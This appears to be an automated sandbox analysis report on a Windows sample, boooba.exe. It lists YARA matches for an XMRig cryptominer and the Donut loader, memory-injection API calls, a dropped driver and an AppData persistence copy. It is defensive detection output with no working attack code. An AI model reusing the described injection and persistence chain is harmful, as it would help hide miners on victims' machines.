Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\System32\nslookup.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401D58 NtAllocateVirtualMemory, 0_2_00401D58
Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401D18 NtWriteVirtualMemory, 0_2_00401D18
Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_004019D8 NtCreateThreadEx, 0_2_004019D8
Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401D98 NtProtectVirtualMemory, 0_2_00401D98
Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401C98 NtClose, 0_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory, 10_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401D18 NtWriteVirtualMemory, 10_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_004019D8 NtCreateThreadEx, 10_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401D98 NtProtectVirtualMemory, 10_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401C98 NtClose, 10_2_00401C98
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946E106 1_2_000001575946E106
Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946E4D6 1_2_000001575946E4D6
Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946E90E 1_2_000001575946E90E
Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946D4D2 1_2_000001575946D4D2
Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946ED6A 1_2_000001575946ED6A
Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFD9B8A5106 1_2_00007FFD9B8A5106
Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFD9B8A5EB2 1_2_00007FFD9B8A5EB2
Source: C:\Windows\System32\conhost.exe Code function: 14_2_00000299653048D6 14_2_00000299653048D6
Source: C:\Windows\System32\conhost.exe Code function: 14_2_0000029965304506 14_2_0000029965304506
Source: C:\Windows\System32\conhost.exe Code function: 14_2_000002996530516A 14_2_000002996530516A
Source: C:\Windows\System32\conhost.exe Code function: 14_2_0000029965304D0E 14_2_0000029965304D0E
Source: C:\Windows\System32\conhost.exe Code function: 14_2_00000299653038D2 14_2_00000299653038D2
Source: C:\Windows\System32\conhost.exe Code function: 14_2_00007FFD9BAA4F52 14_2_00007FFD9BAA4F52
Source: C:\Windows\System32\conhost.exe Code function: 14_2_00007FFD9BAA41A6 14_2_00007FFD9BAA41A6
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
